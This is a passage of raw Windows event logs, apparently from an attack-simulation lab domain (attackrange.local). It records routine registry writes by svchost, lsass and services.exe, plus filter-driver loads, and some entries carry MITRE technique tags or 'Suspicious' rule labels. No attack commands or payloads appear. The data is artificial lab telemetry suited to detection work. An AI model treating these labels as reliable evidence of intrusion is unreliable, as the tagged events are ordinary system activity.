, "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["46000","0x00000000"]] }{02000000-0005-0000-7DAC-3CA04F55DA01} 614000x8000400000000000166557Systemar-win-2.attackrange.local0x01009FileCrypt2018-08-30T20:44:27.000000000Z197{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Encryption" , "instances" : [["141100","0x00000000"]] }{02000000-0004-0000-189A-29A04F55DA01} 614000x8000400000000000166555Systemar-win-2.attackrange.local0x0009SysmonDrv2024-01-09T11:53:30.000000000Z184{ "flags" : "0x00000038" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["385201","0x00000000"]] }{02000000-0002-0000-7287-16A04F55DA01} 614000x8000400000000000166554Systemar-win-2.attackrange.local0x01003Wof2023-01-06T03:22:00.000000000Z196{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : true , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Compression" , "instances" : [["40700","0x00000000"]] }{02000000-0001-0000-AB24-14A04F55DA01} 13241300x80000000000000001080Microsoft-Windows-Sysmon/Operationalar-win-2-SetValue2024-02-01 20:45:32.287{7A09209E-0094-65BC-1400-000000004603}1036C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{FFFE982E-60DA-444E-A9BE-C10851870964}\NameTypeDWORD (0x00000006)NT AUTHORITY\LOCAL SERVICE 13241300x80000000000000001078Microsoft-Windows-Sysmon/Operationalar-win-2-SetValue2024-02-01 20:45:32.287{7A09209E-0094-65BC-1400-000000004603}1036C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{FFFE982E-60DA-444E-A9BE-C10851870964}\CategoryDWORD (0x00000002)NT AUTHORITY\LOCAL SERVICE 13241300x80000000000000001077Microsoft-Windows-Sysmon/Operationalar-win-2-SetValue2024-02-01 20:45:32.287{7A09209E-0094-65BC-1400-000000004603}1036C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{FFFE982E-60DA-444E-A9BE-C10851870964}\ManagedDWORD (0x00000001)NT AUTHORITY\LOCAL SERVICE 13241300x80000000000000001065Microsoft-Windows-Sysmon/Operationalar-win-2T1101SetValue2024-02-01 20:45:32.178{7A09209E-0094-65BC-1600-000000004603}1192C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Control\Lsa\OfflineProvisioning\4\StatusDWORD (0x00000000)NT AUTHORITY\NETWORK SERVICE 13241300x80000000000000001064Microsoft-Windows-Sysmon/Operationalar-win-2T1101SetValue2024-02-01 20:45:32.178{7A09209E-0094-65BC-1600-000000004603}1192C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Control\Lsa\OfflineProvisioning\3\StatusDWORD (0x00000000)NT AUTHORITY\NETWORK SERVICE 13241300x80000000000000001063Microsoft-Windows-Sysmon/Operationalar-win-2T1101SetValue2024-02-01 20:45:32.178{7A09209E-0094-65BC-1600-000000004603}1192C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Control\Lsa\OfflineProvisioning\2\StatusDWORD (0x00000000)NT AUTHORITY\NETWORK SERVICE 13241300x80000000000000001060Microsoft-Windows-Sysmon/Operationalar-win-2T1101SetValue2024-02-01 20:45:32.162{7A09209E-0093-65BC-0B00-000000004603}584C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\CentralizedAccessPolicies\MaxDataSizeDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000001059Microsoft-Windows-Sysmon/Operationalar-win-2T1101SetValue2024-02-01 20:45:32.100{7A09209E-0094-65BC-1600-000000004603}1192C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Control\Lsa\OfflineProvisioning\NumPartsDWORD (0x00000004)NT AUTHORITY\NETWORK SERVICE 13241300x80000000000000001057Microsoft-Windows-Sysmon/Operationalar-win-2T1101SetValue2024-02-01 20:45:32.100{7A09209E-0094-65BC-1600-000000004603}1192C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Control\Lsa\OfflineProvisioning\4\FlagsDWORD (0x00000000)NT AUTHORITY\NETWORK SERVICE 13241300x80000000000000001055Microsoft-Windows-Sysmon/Operationalar-win-2T1101SetValue2024-02-01 20:45:32.100{7A09209E-0094-65BC-1600-000000004603}1192C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Control\Lsa\OfflineProvisioning\3\FlagsDWORD (0x00000000)NT AUTHORITY\NETWORK SERVICE 13241300x80000000000000001053Microsoft-Windows-Sysmon/Operationalar-win-2T1101SetValue2024-02-01 20:45:32.084{7A09209E-0094-65BC-1600-000000004603}1192C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Control\Lsa\OfflineProvisioning\2\FlagsDWORD (0x00000001)NT AUTHORITY\NETWORK SERVICE 13241300x80000000000000001051Microsoft-Windows-Sysmon/Operationalar-win-2T1101SetValue2024-02-01 20:45:32.084{7A09209E-0094-65BC-1600-000000004603}1192C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Control\Lsa\OfflineProvisioning\1\FlagsDWORD (0x00000001)NT AUTHORITY\NETWORK SERVICE 13241300x80000000000000001050Microsoft-Windows-Sysmon/Operationalar-win-2T1031,T1050SetValue2024-02-01 20:45:32.084{7A09209E-0094-65BC-1600-000000004603}1192C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\Netlogon\StartDWORD (0x00000002)NT AUTHORITY\NETWORK SERVICE 13241300x80000000000000001048Microsoft-Windows-Sysmon/Operationalar-win-2T1101SetValue2024-02-01 20:45:32.084{7A09209E-0094-65BC-1600-000000004603}1192C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Control\Lsa\OfflineJoin\JoinOptionsDWORD (0x00000003)NT AUTHORITY\NETWORK SERVICE 13241300x80000000000000001041Microsoft-Windows-Sysmon/Operationalar-win-2T1101SetValue2024-02-01 20:45:32.084{7A09209E-0094-65BC-1600-000000004603}1192C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Control\Lsa\OfflineJoin\JoinActionDWORD (0x00000001)NT AUTHORITY\NETWORK SERVICE 13241300x80000000000000002229Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 20:44:26.816{03D06954-0289-65BC-E000-000000004603}1944\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000002228Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localSuspicious,ImageBeginWithBackslashSetValue2024-02-01 20:44:26.816{03D06954-0289-65BC-E000-000000004603}1944\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000)NT AUTHORITY\SYSTEM 100304000x8000000000000023378Applicationar-win-dc.attackrange.local55c92734-d682-4d71-983e-d6ec3f16059f 1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 0 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 259182)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )] 2: 22105925-48c3-4ff4-a294-f654bb27e390, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 3: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 4: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 5: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 6: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 7: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 8: 661f7658-7035-4b4c-9f35-010682943ec2, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 9: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 10: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 11: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 12: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 13: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 14: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 15: e73aabfa-12bc-4705-b551-2dd076bebc7d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 16: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )] 106604000x8000000000000023374Applicationar-win-dc.attackrange.localC:\Windows\system32\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000 C:\Windows\system32\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000 13241300x80000000000000001863Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-SetValue2024-02-01 20:39:53.764{03D06954-0199-65BC-1100-000000004603}300C:\Windows\System32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-TaskScheduler/Operational\EnabledDWORD (0x00000001)NT AUTHORITY\LOCAL SERVICE 13241300x80000000000000001849Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-01 20:39:50.155{03D06954-0195-65BC-0B00-000000004603}596C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\SspiCache\pwdssp.dll\VersionDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000001840Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.localT1101SetValue2024-02-01 20:39:50.155{03D06954-0195-65BC-0B00-000000004603}596C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\SspiCache\credssp.dll\VersionDWORD (0x00000001)NT AUTHORITY\SYSTEM 614000x8000400000000000166514Systemar-win-dc.attackrange.local0x010010storqosflt2019-02-17T02:00:41.000000000Z203{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Quota Management" , "instances" : [["244000","0x00000000"]] }{02000000-000C-0000-C404-34CF4E55DA01} 614000x8000400000000000166513Systemar-win-dc.attackrange.local0x01005luafv2021-01-07T22:49:16.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["135000","0x00000000"]] }{02000000-000B-0000-C404-34CF4E55DA01} 614000x8000400000000000166510Systemar-win-dc.attackrange.local0x01005wcifs2021-11-02T00:43:44.000000000Z201{ "flags" : "0x00000014" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Virtualization" , "instances" : [["189900","0x00000000"]] }{02000000-000A-0000-92B6-25CF4E55DA01} 13241300x8000000000000000896Microsoft-Windows-Sysmon/Operationalar-win-2Suspicious,ImageBeginWithBackslashSetValue2024-02-01 20:39:50.642{7A09209E-0185-65BC-C800-000000004603}3796\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshedDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x8000000000000000895Microsoft-Windows-Sysmon/Operationalar-win-2Suspicious,ImageBeginWithBackslashSetValue2024-02-01 20:39:50.642{7A09209E-0185-65BC-C800-000000004603}3796\\?\C:\Windows\system32\wbem\WMIADAP.EXEHKLM\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance\Performance RefreshDWORD (0x00000000)NT AUTHORITY\SYSTEM 614000x8000400000000000166465Systemar-win-dc.attackrange.local0x01009npsvctrig2016-07-16T02:28:33.000000000Z183{ "flags" : "0x00000018" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["46000","0x00000000"]] }{02000000-0007-0000-4F02-7BBD4E55DA01} 614000x8000400000000000166464Systemar-win-dc.attackrange.local0x01009DfsDriver2023-05-05T02:33:31.000000000Z184{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "Filter" , "instances" : [["405000","0x00000001"]] }{02000000-0006-0000-E719-50BD4E55DA01} 614000x8000400000000000166463Systemar-win-dc.attackrange.local0x01009FileCrypt2018-08-30T20:44:27.000000000Z197{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Encryption" , "instances" : [["141100","0x00000000"]] }{02000000-0005-0000-ACB7-4DBD4E55DA01} 614000x8000400000000000166461Systemar-win-dc.attackrange.local0x0009SysmonDrv2024-01-09T11:53:30.000000000Z184{ "flags" : "0x00000038" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "(null)" , "instances" : [["385201","0x00000000"]] }{02000000-0003-0000-A106-1EBD4E55DA01} 614000x8000400000000000166460Systemar-win-dc.attackrange.local0x01006DfsrRo2016-07-16T02:20:37.000000000Z203{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Content Screener" , "instances" : [["261100","0x00000000"]] }{02000000-0002-0000-31B8-1BBD4E55DA01} 614000x8000400000000000166459Systemar-win-dc.attackrange.local0x01003Wof2023-01-06T03:22:00.000000000Z196{ "flags" : "0x00000010" , "registration_version" : "0x00000203" , "tx" : true , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Compression" , "instances" : [["40700","0x00000000"]] }{02000000-0001-0000-31B8-1BBD4E55DA01} 13241300x80000000000000001780Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:39:00.414{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EFS\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001779Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:39:00.414{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ADWS\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001778Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:57.962{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Dfs\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001777Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:57.962{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001776Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:57.962{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\TrkWks\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000001775Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:57.962{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Kdc\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001774Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:57.962{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IsmServ\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001773Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:57.962{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001772Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:57.493{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\SSDPSRV\StartDWORD (0x00000004)NT AUTHORITY\SYSTEM 13241300x80000000000000001771Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:57.493{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\upnphost\StartDWORD (0x00000004)NT AUTHORITY\SYSTEM 13241300x80000000000000001770Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:52.447{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NtFrs\StartDWORD (0x00000004)NT AUTHORITY\SYSTEM 13241300x80000000000000001769Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:52.447{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DFSR\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001768Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:50.885{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Dfs\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001767Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:50.885{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001766Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:50.885{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\TrkWks\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000001765Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:50.885{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Kdc\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001764Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:50.885{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IsmServ\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001763Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:50.885{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001762Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:50.885{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Netlogon\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001761Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:50.885{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\W32Time\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001760Microsoft-Windows-Sysmon/Operationalar-win-dcT1101SetValue2024-02-01 20:38:50.885{03D06954-0095-65BC-0B00-000000004503}584C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\CentralizedAccessPolicies\MaxDataSizeDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000001759Microsoft-Windows-Sysmon/Operationalar-win-dcT1101SetValue2024-02-01 20:38:50.869{03D06954-0095-65BC-0B00-000000004503}584C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\CentralizedAccessPolicies\MaxDataSizeDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000001758Microsoft-Windows-Sysmon/Operationalar-win-dcT1101SetValue2024-02-01 20:38:38.455{03D06954-0095-65BC-0B00-000000004503}584C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Control\Lsa\CentralizedAccessPolicies\MaxDataSizeDWORD (0x00000000)NT AUTHORITY\SYSTEM 614000x8000400000000000166383Systemar-win-dc0x01006DfsrRo2016-07-16T02:20:37.000000000Z203{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "FSFilter Content Screener" , "instances" : [["261100","0x00000000"]] }{02000000-000C-0000-F1DA-218D4E55DA01} 614000x8000400000000000166382Systemar-win-dc0x01009DfsDriver2023-05-05T02:33:31.000000000Z184{ "flags" : "0x00000000" , "registration_version" : "0x00000203" , "tx" : false , "sections" : false , "frame" : 0 , "class_name" : "Filter" , "instances" : [["405000","0x00000001"]] }{02000000-000B-0000-411B-1D8D4E55DA01} 13241300x80000000000000001724Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:01.337{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\KdsSvc\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000001722Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:01.337{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ADWS\StartDWORD (0x00000004)NT AUTHORITY\SYSTEM 13241300x80000000000000001720Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:01.337{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DfsDriver\StartDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000001718Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:01.321{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NtFrs\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000001716Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:01.321{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DsRoleSvc\StartDWORD (0x00000003)NT AUTHORITY\SYSTEM 13241300x80000000000000001714Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:01.306{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DfsrRo\StartDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000001712Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:01.306{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Dfs\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001710Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:01.290{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\DFSR\StartDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001708Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:01.040{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\NTDS\StartDWORD (0x00000004)NT AUTHORITY\SYSTEM 13241300x80000000000000001706Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:00.853{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Kdc\StartDWORD (0x00000004)NT AUTHORITY\SYSTEM 13241300x80000000000000001704Microsoft-Windows-Sysmon/Operationalar-win-dcT1031,T1050SetValue2024-02-01 20:38:00.759{03D06954-0095-65BC-0A00-000000004503}576C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\IsmServ\StartDWORD (0x00000004)NT AUTHORITY\SYSTEM 13241300x80000000000000001703Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.634{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-ServerFilter/Analytic\TypeDWORD (0x00000002)NT AUTHORITY\SYSTEM 13241300x80000000000000001701Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.634{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-ServerFilter/Analytic\IsolationDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000001700Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.634{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-ServerFilter/Analytic\EnabledDWORD (0x00000000)NT AUTHORITY\SYSTEM 13241300x80000000000000001698Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 20:38:00.431{03D06954-00C1-65BC-3A01-000000004503}2660C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.6451_none_7f00c1b821f26339\TiWorker.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-DFSN-Server/Operational\TypeDWORD (0x00000001)NT AUTHORITY\SYSTEM 13241300x80000000000000001697Microsoft-Windows-Sysmon/Operationalar-win-dc-SetValue2024-02-01 